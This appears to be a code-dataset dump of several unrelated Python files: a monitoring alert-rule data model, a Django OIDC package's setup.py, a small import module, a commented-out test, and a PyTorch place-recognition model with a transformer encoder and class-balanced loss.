    created by any Rule subclass. However, in order to add new rules one must
    use one of the Rule subclasses, which represent different rule types, each
    associated with the corresponding backend plugin.

    """

    id = me.StringField(primary_key=True, default=lambda: uuid.uuid4().hex)
    title = me.StringField(required=True)
    # Owning Organization id (stored as a plain string; see `owner` below).
    owner_id = me.StringField(required=True)

    # Specifies a list of queries to be evaluated. Results will be logically
    # ANDed together in order to decide whether an alert should be raised.
    queries = me.EmbeddedDocumentListField(QueryCondition, required=True)

    # Defines the time window and frequency of each search.
    window = me.EmbeddedDocumentField(Window, required=True)
    frequency = me.EmbeddedDocumentField(Frequency, required=True)

    # Associates a reminder offset, which will cause an alert to be fired if
    # and only if the threshold is exceeded for a number of trigger_after
    # intervals.
    trigger_after = me.EmbeddedDocumentField(
        TriggerOffset, default=lambda: TriggerOffset(period='minutes')
    )

    # Defines a list of actions to be executed once the rule is triggered.
    # Defaults to just notifying the users.
    actions = me.EmbeddedDocumentListField(
        BaseAlertAction, required=True, default=lambda: [NotificationAction()]
    )

    # Disable the rule organization-wide.
    disabled = me.BooleanField(default=False)

    # Fields passed to scheduler as optional arguments.
    queue = me.StringField()
    exchange = me.StringField()
    routing_key = me.StringField()

    # Fields updated by the scheduler.
    last_run_at = me.DateTimeField()
    run_immediately = me.BooleanField()
    total_run_count = me.IntField(min_value=0, default=0)
    total_check_count = me.IntField(min_value=0, default=0)

    # Field updated by dramatiq workers. This is where workers keep state.
    states = me.MapField(field=me.EmbeddedDocumentField(RuleState))

    meta = {
        'strict': False,
        'collection': 'rules',
        'allow_inheritance': True,
        'indexes': [
            'owner_id',
            {
                'fields': ['owner_id', 'title'],
                'sparse': False,
                'unique': True,
                'cls': False,
            }
        ]
    }

    _controller_cls = None
    _backend_plugin = None
    _data_type_str = None

    def __init__(self, *args, **kwargs):
        super(Rule, self).__init__(*args, **kwargs)
        # Guard against direct instantiation of the abstract base: every
        # concrete subclass must wire up a controller and a backend plugin.
        if self._controller_cls is None:
            raise TypeError(
                "Cannot instantiate self. %s is a base class and cannot be "
                "used to insert or update alert rules and actions. Use a "
                "subclass of self that defines a `_controller_cls` class "
                "attribute derived from `mist.api.rules.base:BaseController`, "
                "instead." % self.__class__.__name__
            )
        if self._backend_plugin is None:
            raise NotImplementedError(
                "Cannot instantiate self. %s does not define a backend_plugin "
                "in order to evaluate rules against the corresponding backend "
                "storage." % self.__class__.__name__
            )
        if self._data_type_str not in ('metrics', 'logs', ):
            raise TypeError(
                "Cannot instantiate self. %s is a base class and cannot be "
                "used to insert or update rules. Use a subclass of self that "
                "defines a `_backend_plugin` class attribute, as well as the "
                "requested data's type via the `_data_type_str` attribute, "
                "instead." % self.__class__.__name__
            )
        self.ctl = self._controller_cls(self)

    @classmethod
    def add(cls, auth_context, title=None, **kwargs):
        """Add a new Rule.

        New rules should be added by invoking this class method on a Rule
        subclass.

        Arguments:
            auth_context: the requesting user's auth context (carries the
                          owning Organization)
            title: the name of the rule. This must be unique per Organization
            kwargs: additional keyword arguments that will be passed to the
                    corresponding controller in order to set up the rule

        """
        try:
            cls.objects.get(owner_id=auth_context.owner.id, title=title)
        except cls.DoesNotExist:
            rule = cls(owner_id=auth_context.owner.id, title=title)
            rule.ctl.set_auth_context(auth_context)
            rule.ctl.add(**kwargs)
        else:
            raise BadRequestError('Title "%s" is already in use' % title)
        return rule

    @property
    def owner(self):
        """Return the Organization (instance) owning self.

        We refrain from storing the owner as a me.ReferenceField in order to
        avoid automatic/unwanted dereferencing.

        """
        return Organization.objects.get(id=self.owner_id)

    @property
    def org(self):
        """Return the Organization (instance) owning self.

        """
        return self.owner

    @property
    def plugin(self):
        """Return the instance of a backend plugin.

        Subclasses MUST define the plugin to be used, instantiated with `self`.

        """
        return self._backend_plugin(self)

    # NOTE The following properties are required by the scheduler.

    @property
    def name(self):
        """Return the name of the task.

        """
        return 'Org(%s):Rule(%s)' % (self.owner_id, self.id)

    @property
    def task(self):
        """Return the dramatiq task to run.

        This is the most basic dramatiq task that should be used for most rule
        evaluations. However, subclasses may provide their own property or
        class attribute based on their needs.

        """
        return 'mist.api.rules.tasks.evaluate'

    @property
    def args(self):
        """Return the args of the dramatiq task."""
        return (self.id, )

    @property
    def kwargs(self):
        """Return the kwargs of the dramatiq task."""
        return {}

    @property
    def expires(self):
        """Return None to denote that self is not meant to expire."""
        return None

    @property
    def enabled(self):
        """Return True if the dramatiq task is currently enabled.

        Subclasses MAY override or extend this property.

        """
        return not self.disabled

    def is_arbitrary(self):
        """Return True if self is arbitrary.

        Arbitrary rules lack a list of `selectors` that refer to resources
        either by their UUIDs or by tags. Such a list makes it easy to setup
        rules referencing specific resources without the need to provide the
        raw query expression.

        """
        return 'selectors' not in type(self)._fields

    def clean(self):
        # FIXME This is needed in order to ensure rule name convention remains
        # backwards compatible with the old monitoring stack. However, it will
        # have to change in the future due to uniqueness constrains.
        if not self.title:
            self.title = 'rule%d' % self.owner.rule_counter

    def as_dict(self):
        # JSON-serializable representation used by the API layer.
        return {
            'id': self.id,
            'title': self.title,
            'queries': [query.as_dict() for query in self.queries],
            'window': self.window.as_dict(),
            'frequency': self.frequency.as_dict(),
            'trigger_after': self.trigger_after.as_dict(),
            'actions': [action.as_dict() for action in self.actions],
            'disabled': self.disabled,
            'data_type': self._data_type_str,
        }

    def __str__(self):
        return '%s %s of %s' % (self.__class__.__name__,
                                self.title, self.owner)
class ArbitraryRule(Rule):
    """A rule defined by a single, arbitrary query string.

    Arbitrary rules permit the definition of complex query expressions by
    allowing users to define fully qualified queries in "raw mode" as a
    single string. In such case, a query expression may be a composite query
    that includes nested aggregations and/or additional queries.

    An `ArbitraryRule` must define a single `QueryCondition`, whose `target`
    defines the entire query expression as a single string.

    """

    _controller_cls = ArbitraryRuleController
class ResourceRule(Rule, SelectorClassMixin):
    """A rule bound to a specific resource type.

    Resource-bound rules are less elastic than arbitrary rules, but allow
    users to perform quick, more dynamic filtering given a resource object's
    UUID, tags, or model fields.

    Every subclass of `ResourceRule` MUST define its `selector_resource_cls`
    class attribute in order for queries to be executed against the intended
    mongodb collection.

    A `ResourceRule` may also apply to multiple resources, which depends on
    the rule's list of `selectors`. By default such a rule will trigger an
    alert if just one of its queries evaluates to True.

    """

    _controller_cls = ResourceRuleController

    @property
    def enabled(self):
        # Enabled only if not disabled AND at least one resource matches
        # the rule's selectors.
        return (super(ResourceRule, self).enabled and
                bool(self.get_resources().count()))

    def clean(self):
        # Enforce singular resource types for uniformity.
        if self.resource_model_name.endswith('s'):
            self.resource_model_name = self.resource_model_name[:-1]
        super(ResourceRule, self).clean()

    def as_dict(self):
        d = super(ResourceRule, self).as_dict()
        d['selectors'] = [cond.as_dict() for cond in self.selectors]
        d['resource_type'] = self.resource_model_name
        return d

    # FIXME All following properties are for backwards compatibility.
    # NOTE: the original asserts used `is 1`, an identity comparison with an
    # int literal — a SyntaxWarning on Python >= 3.8 that only worked via
    # CPython's small-int caching. Replaced with the equality test `== 1`.

    @property
    def metric(self):
        assert len(self.queries) == 1
        return self.queries[0].target

    @property
    def operator(self):
        assert len(self.queries) == 1
        return self.queries[0].operator

    @property
    def value(self):
        assert len(self.queries) == 1
        return self.queries[0].threshold

    @property
    def aggregate(self):
        assert len(self.queries) == 1
        return self.queries[0].aggregation

    @property
    def reminder_offset(self):
        return self.frequency.timedelta.total_seconds() - 60

    @property
    def action(self):
        # Return the legacy action keyword for the highest-priority action,
        # scanning the list from the end.
        for action in reversed(self.actions):
            if action.atype == 'command':
                return 'command'
            if action.atype == 'machine_action':
                return action.action
            if action.atype == 'notification':
                return 'alert'
class MachineMetricRule(ResourceRule):
    """Resource rule evaluating monitoring metrics of machines."""

    _data_type_str = 'metrics'

    @property
    def _backend_plugin(self):
        # Select the metrics backend plugin based on the configured
        # monitoring method suffix.
        if config.DEFAULT_MONITORING_METHOD.endswith('-graphite'):
            return GraphiteBackendPlugin
        if config.DEFAULT_MONITORING_METHOD.endswith('-influxdb'):
            return InfluxDBBackendPlugin
        if config.DEFAULT_MONITORING_METHOD.endswith('-tsfdb'):
            return FoundationDBBackendPlugin
        if config.DEFAULT_MONITORING_METHOD.endswith('-victoriametrics'):
            return VictoriaMetricsBackendPlugin
        raise Exception()

    def clean(self):
        super(MachineMetricRule, self).clean()
        # This rule type may only target machines.
        if self.resource_model_name != 'machine':
            raise me.ValidationError(
                'Invalid resource type "%s". %s can only operate on machines' %
                (self.resource_model_name, self.__class__.__name__))
class NoDataRule(MachineMetricRule):
    """Internal rule that fires when a monitored machine stops reporting data."""

    _controller_cls = NoDataRuleController

    @property
    def _backend_plugin(self):
        # Select the no-data plugin matching the configured monitoring method.
        if config.DEFAULT_MONITORING_METHOD.endswith('-graphite'):
            return GraphiteNoDataPlugin
        if config.DEFAULT_MONITORING_METHOD.endswith('-influxdb'):
            return InfluxDBNoDataPlugin
        if config.DEFAULT_MONITORING_METHOD.endswith('-tsfdb'):
            return FoundationDBNoDataPlugin
        if config.DEFAULT_MONITORING_METHOD.endswith('-victoriametrics'):
            return VictoriaMetricsNoDataPlugin
        raise Exception()

    # FIXME All following properties are for backwards compatibility.
    # However, this rule is not meant to match any queries, but to be
    # used internally, thus the `None`s.

    @property
    def metric(self):
        return None

    @property
    def operator(self):
        return None

    @property
    def value(self):
        return None

    @property
    def aggregate(self):
        return None

    @property
    def reminder_offset(self):
        return None

    @property
    def action(self):
        return ''
class ResourceLogsRule(ResourceRule):
    """Resource-bound rule evaluated against log data in Elasticsearch."""
    _data_type_str = 'logs'
    _backend_plugin = ElasticSearchBackendPlugin
class ArbitraryLogsRule(ArbitraryRule):
    """Arbitrary-query rule evaluated against log data in Elasticsearch."""
    _data_type_str = 'logs'
    _backend_plugin = ElasticSearchBackendPlugin
def _populate_rules():
    """Populate RULES with mappings from rule type to rule subclass.

    RULES is a mapping (dict) from rule types to subclasses of Rule.
    A rule's type is the concat of two strings: <str1>-<str2>, where
    str1 denotes whether the rule is arbitrary or not and str2 equals
    the `_data_type_str` class attribute of the rule, which is simply
    the type of the requested data, like logs or monitoring metrics.
    The aforementioned concatenation is simply a way to categorize a
    rule, such as saying a rule on arbitrary logs or a resource-bound
    rule referring to the monitoring data of machine A.

    """
    public_rule_map = {}
    # Abstract/internal rule classes that must not be publicly exposed.
    hidden_rule_cls = (ArbitraryRule, ResourceRule, NoDataRule, )
    # Scan this module's globals for concrete Rule subclasses by the
    # `*Rule` naming convention.
    for key, value in list(globals().items()):
        if not key.endswith('Rule'):
            continue
        if value in hidden_rule_cls:
            continue
        if not issubclass(value, (ArbitraryRule, ResourceRule, )):
            continue
        str1 = 'resource' if issubclass(value, ResourceRule) else 'arbitrary'
        rule_key = '%s-%s' % (str1, value._data_type_str)
        public_rule_map[rule_key] = value
    return public_rule_map
RULES = _populate_rules()
| 1.625 | 2 |
setup.py | andrewwhitehead/django-oidc-rp | 20 | 16957 | <reponame>andrewwhitehead/django-oidc-rp<gh_stars>10-100
# -*- coding: utf-8 -*-
import codecs
from os.path import abspath
from os.path import dirname
from os.path import join
from setuptools import find_packages
from setuptools import setup
import oidc_rp
def read_relative_file(filename):
    """ Returns contents of the given file, whose path is supposed relative to this module. """
    base_dir = dirname(abspath(__file__))
    full_path = join(base_dir, filename)
    with codecs.open(full_path, encoding='utf-8') as handle:
        return handle.read()
# Package metadata for django-oidc-rp; the long description is taken
# verbatim from README.rst sitting next to this setup.py.
setup(
    name='django-oidc-rp',
    version=oidc_rp.__version__,
    author='impak Finance',
    author_email='<EMAIL>',
    packages=find_packages(exclude=['tests.*', 'tests']),
    include_package_data=True,
    url='https://github.com/impak-finance/django-oidc-rp',
    license='MIT',
    description='A server side OpenID Connect Relying Party (RP/Client) implementation for Django.',
    long_description=read_relative_file('README.rst'),
    keywords='django openidconnect oidc client rp authentication auth',
    zip_safe=False,
    install_requires=[
        'django>=1.11',
        'jsonfield2',
        'pyjwkest>=1.4',
        'requests>2.0',
    ],
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Web Environment',
        'Framework :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Natural Language :: English',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
    ],
)
| 1.898438 | 2 |
nndet/evaluator/detection/__init__.py | joeranbosma/nnDetection | 242 | 16958 | <reponame>joeranbosma/nnDetection<gh_stars>100-1000
from nndet.evaluator.detection.froc import FROCMetric
from nndet.evaluator.detection.coco import COCOMetric
from nndet.evaluator.detection.hist import PredictionHistogram
| 1.179688 | 1 |
tests/test_update.py | sosie-js/ankisync2 | 39 | 16959 | # from ankisync2.apkg import Apkg, db
# Has to be done through normal database methods
# def test_update():
# apkg = Apkg("example1.apkg")
# for n in db.Notes.filter(db.Notes.data["field1"] == "data1"):
# n.data["field3"] = "data2"
# n.save()
# apkg.close()
| 2.46875 | 2 |
lib/place_model.py | ihaeyong/drama-graph | 3 | 16960 | import torch
import torch.nn as nn
from torchvision.datasets.vision import VisionDataset
from PIL import Image
import os, sys, math
import os.path
import torch
import json
import torch.utils.model_zoo as model_zoo
from Yolo_v2_pytorch.src.utils import *
from Yolo_v2_pytorch.src.yolo_net import Yolo
from Yolo_v2_pytorch.src.yolo_tunning import YoloD
import numpy as np
import torch.nn.functional as F
from Yolo_v2_pytorch.src.rois_utils import anchorboxes
from Yolo_v2_pytorch.src.anotherMissOh_dataset import FaceCLS
from lib.person_model import person_model
# Maps place-name labels to integer class ids (22 classes). The empty
# string '' is aliased to class 9, the same id as 'none'.
label_dict = {'' : 9, 'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
              'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
              'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
             }
# Identical to label_dict except the '' alias is dropped. Despite the
# name it still contains 'none' (id 9); it is used for the inverse
# (id -> name) mapping in label_remapping.
label_dict_wo_none = {'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
              'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
              'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
             }
def label_mapping(target):
    """Map raw place-name entries to integer class ids via ``label_dict``.

    Any label starting with 'con' is first normalised (in place, inside
    *target*) to 'convenience store'.
    """
    mapped = []
    for entry in target:
        if entry[0][:3] == 'con':
            entry[0] = 'convenience store'
        mapped.append(label_dict[entry[0]])
    return mapped
def label_remapping(target):
    """Map integer class ids back to their place-name strings."""
    id_to_name = {v: k for k, v in label_dict_wo_none.items()}
    return [id_to_name[class_id] for class_id in target]
def conv3x3(in_planes, out_planes, stride=1):
    """3x3 convolution with padding=1 and no bias term."""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
    )
def accuracy(output, target, topk=(1,)):
    """Computes the accuracy over the k top predictions for the specified values of k.

    Args:
        output: (batch, num_classes) score/logit tensor.
        target: (batch,) tensor of ground-truth class indices.
        topk: iterable of k values to report top-k accuracy for.

    Returns:
        List of one-element tensors, one per k, holding accuracy in percent.
    """
    with torch.no_grad():
        maxk = max(topk)
        batch_size = target.size(0)
        _, pred = output.topk(maxk, 1, True, True)
        pred = pred.t()
        correct = pred.eq(target.view(1, -1).expand_as(pred))
        res = []
        for k in topk:
            # reshape (not view): correct[:k] is a non-contiguous slice, and
            # calling view() on it raises a RuntimeError in recent PyTorch.
            correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)
            res.append(correct_k.mul_(100.0 / batch_size))
        return res
def place_buffer(images_norm, buffer_images):
    """Return a 10-frame buffer, left-padding with the first frame when short.

    An empty buffer is first seeded with *images_norm* itself.
    """
    if not buffer_images:
        buffer_images = images_norm
    shortfall = 10 - len(buffer_images)
    if shortfall > 0:
        # Prepend copies of the very first frame until we reach 10 entries.
        buffer_images = [images_norm[0]] * shortfall + buffer_images
        assert len(buffer_images) == 10, 'Buffer failed'
    return buffer_images
class AverageMeter(object):
    """Tracks the latest value and running average of a metric."""

    def __init__(self, name, fmt=':f'):
        self.name = name
        self.fmt = fmt
        self.reset()

    def reset(self):
        """Clear all accumulated statistics."""
        self.val = 0
        self.avg = 0
        self.sum = 0
        self.count = 0

    def update(self, val, n=1):
        """Record *val* observed *n* times and refresh the running average."""
        self.val = val
        self.count += n
        self.sum += val * n
        self.avg = self.sum / self.count

    def __str__(self):
        template = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
        return template.format(**self.__dict__)
class ProgressMeter(object):
    """Formats and prints a batch-progress line from a set of meters."""

    def __init__(self, num_batches, meters, prefix=""):
        self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
        self.meters = meters
        self.prefix = prefix

    def display(self, batch):
        """Print the prefix, batch counter, and every meter, tab-separated."""
        pieces = [self.prefix + self.batch_fmtstr.format(batch)]
        pieces.extend(str(meter) for meter in self.meters)
        print('\t'.join(pieces))

    def _get_batch_fmtstr(self, num_batches):
        # Counter field width equals the digit count of num_batches.
        width = len(str(num_batches // 1))
        field = '{:' + str(width) + 'd}'
        return '[' + field + '/' + field.format(num_batches) + ']'
# Default per-class sample counts used to derive class-balanced weights.
# NOTE(review): entries of 0 (indices 17 and 21) make effective_num zero and
# the corresponding weight infinite — callers appear to always pass real
# counts; confirm before relying on the default.
sample_default = [105, 462, 953, 144, 108, 13, 123, 510, 1690, 19914, 1541, 126, 67, 592, 1010, 53, 2087, 0, 1547, 576, 74, 0]

def CB_loss(labels, logits, beta=0.99, gamma=0.5, samples_per_cls=sample_default, no_of_classes=22, loss_type='softmax'):
    """Compute the Class Balanced Loss between `logits` and the ground truth `labels`.
    Class Balanced Loss: ((1-beta)/(1-beta^n))*Loss(labels, logits)
    where Loss is one of the standard losses used for Neural Networks.
    Args:
      labels: A int tensor of size [batch].
      logits: A float tensor of size [batch, no_of_classes].
      samples_per_cls: A python list of size [no_of_classes].
      no_of_classes: total number of classes. int
      loss_type: string. One of "sigmoid", "focal", "softmax".
      beta: float. Hyperparameter for Class balanced loss.
      gamma: float. Hyperparameter for Focal loss.
    Returns:
      cb_loss: A float tensor representing class balanced loss
    """
    # Per-class weight = (1 - beta) / (1 - beta^n_c), normalised so the
    # weights sum to no_of_classes.
    effective_num = 1.0 - np.power(beta, samples_per_cls)
    weights = (1.0 - beta) / np.array(effective_num)
    weights = weights / np.sum(weights) * no_of_classes

    labels_one_hot = F.one_hot(labels, no_of_classes).cpu().float()

    # Expand the class weights to one weight per (sample, class) entry,
    # where each row carries the weight of that sample's true class.
    weights = torch.tensor(weights).float()
    weights = weights.unsqueeze(0)
    weights = weights.repeat(labels_one_hot.shape[0],1) * labels_one_hot
    weights = weights.sum(1)
    weights = weights.unsqueeze(1)
    weights = weights.repeat(1,no_of_classes)

    if loss_type == "focal":
        cb_loss = focal_loss(labels_one_hot.cuda(), logits, weights.cuda(), gamma)
    elif loss_type == "sigmoid":
        # Fixed: binary_cross_entropy_with_logits takes `weight`, not
        # `weights`; the original kwarg raised TypeError whenever this
        # branch ran.
        cb_loss = F.binary_cross_entropy_with_logits(input = logits, target = labels_one_hot, weight = weights)
    elif loss_type == "softmax":
        pred = logits.softmax(dim = 1)
        cb_loss = F.binary_cross_entropy(input = pred, target = labels_one_hot.cuda(), weight = weights.cuda())
    return cb_loss
def focal_loss(labels, logits, alpha, gamma):
    """Compute the focal loss between `logits` and the ground truth `labels`.

    Focal loss = -alpha_t * (1-pt)^gamma * log(pt), where pt is the
    probability of being classified to the true class
    (pt = p if true class, otherwise 1 - p; p = sigmoid(logit)).

    Args:
      labels: A float tensor of size [batch, num_classes].
      logits: A float tensor of size [batch, num_classes].
      alpha: A float tensor of size [batch_size]
        specifying per-example weight for balanced cross entropy.
      gamma: A float scalar modulating loss from hard and easy examples.

    Returns:
      focal_loss: A float32 scalar representing normalized total loss.
    """
    bce = F.binary_cross_entropy_with_logits(input=logits, target=labels, reduction="none")

    if gamma == 0.0:
        modulator = 1.0
    else:
        # Numerically stable form of (1 - pt)^gamma written via logits.
        modulator = torch.exp(
            -gamma * labels * logits
            - gamma * torch.log(1 + torch.exp(-1.0 * logits)))

    weighted = alpha * (modulator * bce)
    total = torch.sum(weighted)
    return total / torch.sum(labels)
class place_model(nn.Module):
    """Scene/place classifier over a clip of frames.

    Pipeline: YOLO backbone features -> 128-d per-frame embedding ->
    BERT encoder over the T frames -> weighted temporal pooling driven by
    a learned per-frame "change" score -> 22-way place logits (see
    label_dict for the class ids).
    """
    def __init__(self, num_persons, num_faces, device):
        super(place_model, self).__init__()
        # YOLO person detector whose trunk is reused (via YoloD) as the
        # frame feature extractor.
        pre_model = Yolo(num_persons).cuda(device)
        num_face_cls = num_faces
        self.detector = YoloD(pre_model).cuda(device)
        # Reduce the 1024-channel backbone map to 128 channels, halving H/W.
        self.place_conv = nn.Sequential(nn.Conv2d(1024, 128, 3, 1, 1, bias=False), nn.BatchNorm2d(128),
                                   nn.LeakyReLU(0.1, inplace=True), nn.MaxPool2d(2, 2))
        # assumes the pooled feature map is 7x7 at this point — TODO confirm
        # against the detector's input resolution.
        self.avgpool = nn.AvgPool2d(7, stride=1)
        # self.lstm_sc = torch.nn.LSTM(input_size=128, hidden_size=128, num_layers=2, batch_first=True)
        # self.bert_fc1 = torch.nn.Linear(128, 768)
        # self.bert_fc2 = torch.nn.Linear(768, 128)
        self.bert = BERT()
        # fc2: per-frame scalar "change" score; fc3: 22-way class logits.
        self.fc2 = torch.nn.Linear(128, 1)
        self.fc3 = torch.nn.Linear(128, 22)
        self.softmax = torch.nn.Softmax(dim=1)
        # # define face
        # self.face_conv = nn.Conv2d(
        #     1024, len(self.detector.anchors) * (5 + num_face_cls), 1, 1, 0, bias=False)
    def forward(self, image):
        # image: (N clips, T frames, C, H, W); flatten to run the backbone
        # over every frame at once.
        N, T , C, H, W = image.size(0), image.size(1), image.size(2), image.size(3), image.size(4)
        image = image.reshape(N*T, C, H, W)
        # feature map of backbone
        fmap, output_1 = self.detector(image)
        fmap = self.place_conv(fmap)
        x = self.avgpool(fmap)
        x = x.reshape(N, T, -1)
        # self.lstm_sc.flatten_parameters()
        # N, T = x.size(0), x.size(1)
        # x = self.lstm_sc(x)[0]
        # x = self.bert_fc1(x)
        x = self.bert(x)
        # x = self.bert_fc2(x)
        # Scalar "change" score per frame, used below to weight frames.
        change = x.reshape(N*T, -1)
        #x = self.fc1(x)
        change = self.fc2(change)
        change = change.reshape(N, T)
        #x = x.reshape(N*T, -1)
        # NOTE(review): the block below appears to build a (N, T, T)
        # frame-weighting matrix ww from max-shifted exponentials of the
        # change scores (the M>=0 split looks like an overflow guard) and
        # then pools the BERT features with it — confirm the intended
        # semantics before modifying.
        M, _ = change.max(1)
        w = change - M.view(-1,1)
        w = w.exp()
        w = w.unsqueeze(1).expand(-1,w.size(1),-1)
        w = w.triu(1) - w.tril()
        w = w.cumsum(2)
        w = w - w.diagonal(dim1=1,dim2=2).unsqueeze(2)
        ww = w.new_empty(w.size())
        idx = M>=0
        ww[idx] = w[idx] + M[idx].neg().exp().view(-1,1,1)
        idx = ~idx
        ww[idx] = M[idx].exp().view(-1,1,1)*w[idx] + 1
        ww = (ww+1e-10).pow(-1)
        ww = ww/ww.sum(1,True)
        x = ww.transpose(1,2).bmm(x)
        x = x.reshape(N*T, -1)
        x = self.fc3(x)
        x = x.reshape(N*T, -1)
        # Returns raw logits of shape (N*T, 22); self.softmax is not applied here.
        return x
class BERT(nn.Module):
    """
    BERT model : Bidirectional Encoder Representations from Transformers.
    """

    def __init__(self, vocab_size=0, hidden=128, n_layers=5, attn_heads=8, dropout=0.):
        """
        :param vocab_size: vocab_size of total words
        :param hidden: BERT model hidden size
        :param n_layers: numbers of Transformer blocks(layers)
        :param attn_heads: number of attention heads
        :param dropout: dropout rate
        """
        super(BERT, self).__init__()
        self.hidden = hidden
        self.n_layers = n_layers
        self.attn_heads = attn_heads

        # The paper uses 4 * hidden_size for the feed-forward network.
        self.feed_forward_hidden = hidden * 4

        # Embedding step (here only the positional signal is added).
        self.embedding = BERTEmbedding(vocab_size=vocab_size, embed_size=hidden)

        # Stack of transformer encoder blocks.
        self.transformer_blocks = nn.ModuleList(
            [TransformerBlock(hidden, attn_heads, hidden * 4, dropout)
             for _ in range(n_layers)])

    def forward(self, x):
        # No padding mask is applied: inputs are dense feature vectors,
        # not token ids, so every position is valid.
        out = self.embedding(x)
        for block in self.transformer_blocks:
            out = block.forward(out, None)
        return out
class BERTEmbedding(nn.Module):
    """
    BERT Embedding which is consisted with under features
        1. TokenEmbedding : normal embedding matrix
        2. PositionalEmbedding : adding positional information using sin, cos
        2. SegmentEmbedding : adding sentence segment info, (sent_A:1, sent_B:2)
        sum of all these features are output of BERTEmbedding
    """

    def __init__(self, vocab_size, embed_size, dropout=0.):
        """
        :param vocab_size: total vocab size
        :param embed_size: embedding size of token embedding
        :param dropout: dropout rate
        """
        super(BERTEmbedding, self).__init__()
        # Token and segment embeddings are disabled here; only the
        # sinusoidal positional signal is added to the dense inputs.
        self.position = PositionalEmbedding(d_model=embed_size)
        self.dropout = nn.Dropout(p=dropout)
        self.embed_size = embed_size

    def forward(self, sequence):
        summed = sequence + self.position(sequence)
        return self.dropout(summed)
class PositionalEmbedding(nn.Module):
    """Sinusoidal positional encoding, precomputed up to ``max_len`` steps."""

    def __init__(self, d_model, max_len=512):
        super(PositionalEmbedding, self).__init__()

        # Build the (1, max_len, d_model) table once, in log space.
        table = torch.zeros(max_len, d_model).float()
        table.require_grad = False

        positions = torch.arange(0, max_len).float().unsqueeze(1)
        div_term = (torch.arange(0, d_model, 2).float()
                    * -(math.log(10000.0) / d_model)).exp()

        table[:, 0::2] = torch.sin(positions * div_term)   # even dims: sine
        table[:, 1::2] = torch.cos(positions * div_term)   # odd dims: cosine
        self.register_buffer('pe', table.unsqueeze(0))

    def forward(self, x):
        # Return encodings for the first x.size(1) time steps.
        return self.pe[:, :x.size(1)]
class TransformerBlock(nn.Module):
    """
    Bidirectional Encoder = Transformer (self-attention)
    Transformer = MultiHead_Attention + Feed_Forward with sublayer connection
    """

    def __init__(self, hidden, attn_heads, feed_forward_hidden, dropout):
        """
        :param hidden: hidden size of transformer
        :param attn_heads: head sizes of multi-head attention
        :param feed_forward_hidden: feed_forward_hidden, usually 4*hidden_size
        :param dropout: dropout rate
        """
        super(TransformerBlock, self).__init__()
        self.attention = MultiHeadedAttention(h=attn_heads, d_model=hidden)
        self.feed_forward = PositionwiseFeedForward(
            d_model=hidden, d_ff=feed_forward_hidden, dropout=dropout)
        self.input_sublayer = SublayerConnection(size=hidden, dropout=dropout)
        self.output_sublayer = SublayerConnection(size=hidden, dropout=dropout)
        self.dropout = nn.Dropout(p=dropout)

    def forward(self, x, mask):
        # Self-attention (query = key = value = x) inside a residual block,
        # then the position-wise feed-forward inside a second residual block.
        attended = self.input_sublayer(
            x, lambda hidden_states: self.attention.forward(
                hidden_states, hidden_states, hidden_states, mask=mask))
        out = self.output_sublayer(attended, self.feed_forward)
        return self.dropout(out)
class MultiHeadedAttention(nn.Module):
    """
    Take in model size and number of heads.
    """

    def __init__(self, h, d_model, dropout=0.1):
        super(MultiHeadedAttention, self).__init__()
        assert d_model % h == 0

        # We assume d_v always equals d_k.
        self.d_k = d_model // h
        self.h = h

        self.linear_layers = nn.ModuleList([nn.Linear(d_model, d_model) for _ in range(3)])
        self.output_linear = nn.Linear(d_model, d_model)
        self.attention = Attention()

        self.dropout = nn.Dropout(p=dropout)

    def forward(self, query, key, value, mask=None):
        batch_size = query.size(0)

        # 1) Project inputs and split each into h heads of width d_k.
        projected = []
        for layer, tensor in zip(self.linear_layers, (query, key, value)):
            projected.append(
                layer(tensor).view(batch_size, -1, self.h, self.d_k).transpose(1, 2))
        query, key, value = projected

        # 2) Scaled dot-product attention over every head in parallel.
        x, attn = self.attention(query, key, value, mask=mask, dropout=self.dropout)

        # 3) Concatenate the heads and apply the final projection.
        x = x.transpose(1, 2).contiguous().view(batch_size, -1, self.h * self.d_k)

        return self.output_linear(x)
class Attention(nn.Module):
    """
    Compute 'Scaled Dot Product Attention'
    """

    def __init__(self):
        super(Attention, self).__init__()

    def forward(self, query, key, value, mask=None, dropout=None):
        scale = math.sqrt(query.size(-1))
        scores = torch.matmul(query, key.transpose(-2, -1)) / scale

        if mask is not None:
            # Masked positions get a large negative score => ~0 probability.
            scores = scores.masked_fill(mask == 0, -1e9)

        weights = F.softmax(scores, dim=-1)

        if dropout is not None:
            weights = dropout(weights)

        return torch.matmul(weights, value), weights
class PositionwiseFeedForward(nn.Module):
    "Implements FFN equation."

    def __init__(self, d_model, d_ff, dropout=0.1):
        super(PositionwiseFeedForward, self).__init__()
        self.w_1 = nn.Linear(d_model, d_ff)
        self.w_2 = nn.Linear(d_ff, d_model)
        self.dropout = nn.Dropout(dropout)
        # GELU was considered (see history); ReLU is the active choice.
        self.activation = nn.ReLU()

    def forward(self, x):
        hidden = self.activation(self.w_1(x))
        return self.w_2(self.dropout(hidden))
class SublayerConnection(nn.Module):
    """
    A residual connection followed by a layer norm.
    Note for code simplicity the norm is first as opposed to last.
    """

    def __init__(self, size, dropout):
        super(SublayerConnection, self).__init__()
        self.norm = nn.LayerNorm(size)
        self.dropout = nn.Dropout(dropout)

    def forward(self, x, sublayer):
        "Apply residual connection to any sublayer with the same size."
        residual = self.dropout(sublayer(self.norm(x)))
        return x + residual
